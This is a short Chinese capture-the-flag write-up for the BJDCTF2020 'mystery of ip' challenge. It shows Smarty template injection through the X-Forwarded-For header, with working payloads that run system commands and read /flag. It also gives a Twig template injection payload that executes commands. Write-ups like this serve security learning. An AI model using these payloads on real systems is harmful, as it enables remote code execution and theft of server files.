[BJDCTF2020]The mystery of ip Write-Up

知识点

• Smarty模板注入

• 能区分那个模板和其注入语法

题解

• 看见hint，抓包试一下，一般的ip都是通过请求头的cilent-ip、X-Forwarded-For等传过去的

• 发现没有这个请求头，自己加一个XFF写值看看是不是？发现变化

  

• 刚开始以为是sql注入，试了一下，貌似不对，可能是模板注入。记下下面这张图。用来区分那个模板，模板注入的语法非常多的。

  

• 经过测试，发现是Smarty模板

  

• {{system('ls /')}}

  

• {system("cat /flag")}

  {if readfile('/flag')}{/if}

总结

• 以前还做过Twig模板注入， 总结一下这两个的语法

• Twig：

  {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
  

• Smarty:

  {if php语句}{/if}

  {if readfile('文件路径')}{/if}

标签：mystery,ip,Smarty,语法,readfile,BJDCTF2020,模板,注入
来源： https://www.cnblogs.com/Q-and-K/p/16142034.html